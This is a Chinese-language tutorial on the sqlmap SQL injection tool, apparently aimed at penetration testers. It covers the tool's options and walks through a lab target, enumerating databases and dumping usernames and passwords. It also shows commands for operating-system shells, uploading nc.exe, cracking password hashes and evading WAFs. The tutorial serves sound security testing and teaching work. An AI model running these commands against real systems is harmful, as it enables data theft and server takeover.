官网 https://sqlmap.org/ sqlmap是一个开源的渗透测试工具，它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎，许多适合于终 极渗透测试的良好特性和众多的操作选项，从数据库指纹、数据获取到访问底层文件系统、执行操作系统命令。

全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB数据库 管理系统。 全面支持六种SQL注入技术:boolean-based盲注、time-based盲注、error-based、UNION查询、堆叠查询和带外查询。 通过提供DBMS凭证、IP地址、端口和数据库名，支持不通过SQL注入的直接连接数据库。 支持枚举用户、密码哈希、特权、角色、数据库、表和列。 自动识别密码哈希格式，支持基于字典的攻击破解。 支持完整转储数据库表，根据用户的选择转储一定范围内的条目或特定列。用户还可以选择只从每列中转储指定字符。 支持搜索特定的数据库名、表名，或跨表搜索特定的列名。这非常有用，例如，识别包含自定义应用程序凭证的表，其相关列名称可能包含 name、pass等字符串。 支持通过数据库服务器所在的文件系统下载和上传任何文件，当数据库软件是MySQL, PostgreSQL或Microsoft SQL server时。 支持通过数据库服务器所在的操作系统执行任意命令并获取输出，当数据库软件为MySQL、PostgreSQL或Microsoft SQL server时。 支持在攻击者机器和数据库服务器所在操作系统之间建立带外有状态的TCP连接，这个通道根据用户的选择可以是交互式命令行、 Meterpreter会话或图形用户界面(VNC)。 支持通过Metasploit的getsystem命令实现数据库进程的用户权限升级。

SQLMAP支持的五种不同的注入方式 B:Boolean-basedblindSQLinjection（布尔型注入） E:Error-basedSQLinjection（报错型注入） U:UNIONquerySQLinjection（可联合查询注入） S:StackedqueriesSQLinjection（可多语句查询注入） T:Time-basedblindSQLinjection（基于时间延迟注入） Q:InlineSQLInjection(内联注入)

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git

访问官网下载：https://sqlmap.org/

在kali中自带sqlmap

更新sqlmap

python sqlmap.py --update

或者

sqlmap --update

显示终端帮助文档

sqlmap -h

显示sqlmap详细的帮助文档

sqlmap -hh

帮助文档中文翻译

sqlmap -u http://sqlmap.com/index.php?id=1 -v 1 sqlmap -u “http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” -v 1 -u 和–url参数一样 都是代表填写测试的url连接 如果存在&符号需要添加把url放在双引号内 -v 表示 输出信息详细程度级别：0-6（默认为 1）

级别越高，信息就越详细，根据需求选择合适的输出信息。

sqlmap 有两种指定目标的方式：

1.使用 -u 指定 测试url（注入点为 get 时使用）

2.使用 -r 指定 请求文件进行请求（注入点为 post 时使用）

指定某个url进行测试 sqlmap -u http://sqlmap.com/index.php?id=1 -v 1

从文件中加载http请求测试 sqlmap -r url.txt

从burpsuite或者日志读取http包 sqlmap -l post.txt

从文本中获取多个目标扫描 sqlmap -m url.txt

url文本内容为：

从谷歌引擎搜索结果扫描 sqlmap可以测试注入google的搜索结果中的get参数

python sqlmap.py -g "inurl:\".php?id=1\""

参数：–data 此参数是把数据以post方式提交，sqlmap会自动检测post参数

sqlmap.py -u http://192.168.0.103/06/vul/sqli/sqli_id.php --data="id=1&submit=查询"

参数拆分字符 参数：–param-del 当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。 例子：sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs -- users

参数：–cookie,–load-cookies,–drop-set-cookie 这个参数在以下两个方面很有用： 1、web应用需要登陆的时候。 2、你想要在这些头参数中测试SQL注入时。 可以通过抓包把cookie获取到，复制出来，然后加到–cookie参数里。 在HTTP请求中，遇到Set-Cookie的话，sqlmap会自动获取并且在以后的请求中加入，并且会尝试SQL注入。 如果你不想接受Set-Cookie可以使用–drop-set-cookie参数来拒接。 当你使用–cookie参数时，当返回一个Set-Cookie头的时候，sqlmap会询问你用哪个cookie来继续接下来的请求。当–level的参数设定为2或 者2以上的时候，sqlmap会尝试注入Cookie参数。

HTTP User-Agent头 参数：–user-agent,–random-agent 默认情况下sqlmap的HTTP请求头中User-Agent值是： 可以使用–user-agent参数来修改，同时也可以使用–random-agent参数来随机的从./txt/user-agents.txt中获取。 当–level参数设定为3或者3以上的时候，会尝试对User-Angent进行注入。

HTTP Referer头 参数：–referer sqlmap可以在请求中伪造HTTP中的referer，当–level参数设定为3或者3以上的时候会尝试对referer注入。 额外的HTTP头 参数：–headers 可以通过–headers参数来增加额外的http头 HTTP认证保护

参数：–auth-type,–auth-cred 这些参数可以用来登陆HTTP的认证保护支持三种方式： 1、Basic 2、Digest 3、NTLM 例子：

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

参数：–proxy,–proxy-cred和–ignore-proxy 使用–proxy代理是格式为：http://url:port。 当HTTP(S)代理需要认证是可以使用–proxy-cred参数：username:password。 –ignore-proxy拒绝使用本地局域网的HTTP(S)代理。

参数：–delay 可以设定两个HTTP(S)请求间的延迟，设定为0.5的时候是半秒，默认是没有延迟的。

参数：–timeout 可以设定一个HTTP(S)请求超过多久判定为超时，10.5表示10.5秒，默认是30秒。

参数：–retries 当HTTP(S)超时时，可以设定重新尝试连接次数，默认是3次。

参数：-p,–skip sqlmap默认测试所有的GET和POST参数，当–level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User- Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如： -p "id,user-anget"

当你使用–level的值很大但是有个别参数不想测试的时候可以使用–skip参数。 例如：--skip="user-angent.referer" 在有些时候web服务器使用了URL重写，导致无法直接使用sqlmap测试参数，可以在想测试的参数后面加* 例如：

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap将会测试value1的位置是否可注入。

参数：–batch 用此参数，不需要用户输入，将会使用sqlmap提示的默认值一直运行下去。

参数：–dbms 默认情况系sqlmap会自动的探测web应用后端的数据库是什么，sqlmap支持的数据库有：

MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

参数：–os 默认情况下sqlmap会自动的探测数据库服务器系统，支持的系统有：Linux、Windows。

参数：–invalid-bignum 当你想指定一个报错的数值时，可以使用这个参数，例如默认情况系id=13，sqlmap会变成id=-13来报错，你可以指定比如id=9999999来报 错。

参数：–invalid-logical 原因同上，可以指定id=13把原来的id=-13的报错改成id=13 AND 18=19。

参数：–prefix,–suffix 在有些环境中，需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。 例如，代码中是这样调用数据库的：

$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

这时你就需要–prefix和–suffix参数了：

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" -- suffix "AND (’abc’=’abc"

这样执行的SQL语句变成：

$query = "SELECT * FROM users WHERE id=(’1’) AND (’abc’=’abc’) LIMIT 0, 1";

参数：–tamper sqlmap除了使用CHAR()函数来防止出现单引号之外没有对注入的数据修改，你可以使用–tamper参数对数据做修改来绕过WAF等设备。 下面是一个tamper脚本的格式：

使用 --list-tampers 可以查看有哪些脚本以及简单介绍

参数：–level 共有五个等级，默认为1，sqlmap使用的payload可以在xml/payloads.xml中看到，你也可以根据相应的格式添加自己的payload。 这个参数不仅影响使用哪些payload同时也会影响测试的注入点，GET和POST的数据都会测试，HTTP Cookie在level为2的时候就会测试， HTTP User-Agent/Referer头在level为3的时候就会测试。 总之在你不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值。

参数：–risk 共有四个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。 在有些时候，例如在UPDATE的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险。 测试的语句同样可以在xml/payloads.xml中找到，你也可以自行添加payload。

参数：–technique 这个参数可以指定sqlmap使用的探测技术，默认情况下会测试所有的方式。 支持的探测方式如下：

参数：–time-sec 当使用继续时间的盲注时，时刻使用–time-sec参数设定延时时间，默认是5秒。

参数：-b,–banner 大多数的数据库系统都有一个函数可以返回数据库的版本号，通常这个函数是version()或者变量@@version这主要取决与是什么数据库。

参数：-current-user 在大多数据库中可以获取到管理数据的用户。

参数：–current-db

返还当前连接的数据库。

参数：–is-dba 判断当前的用户是否为管理，是的话会返回True。

参数：–users 当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户。

参数：–passwords 当前用户有权限读取包含用户密码的彪的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。

例子：

sqlmap -u "http://192.168.150.141/06/vul/sqli/sqli_id.php" -data "id=1&submit=%E6%9F%A5%E8%AF%A2" -p id --passwords

参数：–dbs 当前用户有权限读取包含所有数据库列表信息的表中的时候，即可列出所有的数据库。

参数：–tables,–exclude-sysdbs,-D 当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出一个特定数据的所有表。 如果你不提供-D参数来列指定的一个数据的时候，sqlmap会列出数据库所有库的所有表。 –exclude-sysdbs参数是指包含了所有的系统数据库。 需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是数据库名称。

参数：–columns,-C,-T,-D 当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出指定数据库表中的字段，同时也会列出字段的数据类型。 如果没有使用-D参数指定数据库时，默认会使用当前数据库。

参数：–dump,-C,-T,-D,–start,–stop,–first,–last 如果当前管理员有权限读取数据库其中的一个表的话，那么就能获取真个表的所有内容。 使用-D,-T参数指定想要获取哪个库的哪个表，不适用-D参数时，默认使用当前库。

参数：–count 有时候用户只想获取表中的数据个数而不是具体的内容，那么就可以使用这个参数。

参数：–dump-all,–exclude-sysdbs 使用–dump-all参数获取所有数据库表的内容，可同时加上–exclude-sysdbs只获取用户数据库的表，需要注意在Microsoft SQL Server中 master数据库没有考虑成为一个系统数据库，因为有的管理员会把他当初用户数据库一样来使用它。

参数：–search,-C,-T,-D –search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。 可以在一下三种情况下使用：

参数：–eta 可以计算注入数据的剩余时间。

条件：数据库权限为 DBA 权限

参数：–os-cmd,–os-shell 当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。 在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()。 那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认禁制），sqlmap会重新启用它，如果不存在，会自动创建。

条件：数据库权限为 DBA 权限

参数：–file-read 当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文 件。

例子：

sqlmap -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \ --file-read "C:/example.exe" -v 1

条件：数据库权限为 DBA 权限

参数：–file-write,–file-dest 当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文 件。

例子：

sqlmap -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \ "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

参数：–fresh-queries 忽略session文件保存的查询，重新查询。

参数：–hex 有时候字符编码的问题，可能导致数据丢失，可以使用hex函数来避免

使用参数缩写 参数：-z 有使用参数太长太复杂，可以使用缩写模式。 例如：

sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

可以写成：

sqlmap -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

还有：

sqlmap --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

可以写成：

sqlmap -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

参数：–check-waf WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰，如果怀疑目标有此防护的话，可以使用此参数来测试。 sqlmap将会使用一个不存在的 参数来注入测试

参数：–identify-waf sqlmap可以尝试找出WAF/IPS/IDS保护，方便用户做出绕过方式。目前大约支持30种产品的识别。

例如：

sqlmap -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3

参数：–mobile 有时服务端只接收移动端的访问，此时可以设定一个手机的User-Agent来模仿手机登陆。 例如：

sqlmap -u "http://www.target.com/vuln.php?id=1" --mobile

参数：–flush-session 如果不想用之前缓存这个目标的session文件，可以使用这个参数。 会清空之前的session，重新测试该目标。

修改 lib/core/settings.py 文件 默认最大线程是10 可以设置线程最大为100

MAX_NUMBER_OF_THREADS = 100

结果如下：

在sqlmap中使用默认设置进行注入检测会在cookie中带有sqlmap的字符，容易被waf拦截

同样修改 lib/core/settings.py 文件

DEFAULT_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"

结果如下：

首先我们查找到一个注入点：

http://192.168.150.141/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2

使用命令：

sqlmap -u "http://192.168.150.141/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name --current-db --current-user --is-dba --dbs --batch

-p 指定注入点

–current-db 查看当前数据库

–current-user 查看数据库用户

–is-dba 查看是否为dba

–dbs 查看所有数据库

–batch 默认选择

结果如下：

使用命令：

sqlmap -u "http://192.168.150.141/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -D pikachu --tables --batch

-D 指定数据库

-tables 查看表

结果如下：

使用命令：

sqlmap -u "http://192.168.150.141/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -D pikachu -T users --columns --batch

-T 指定表

–columns 查看字段

结果如下：

使用命令：

sqlmap -u "http://192.168.150.141/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -D pikachu -T users -C username,password --dump --batch

-C 指定字段

–dump 查看值

结果如下：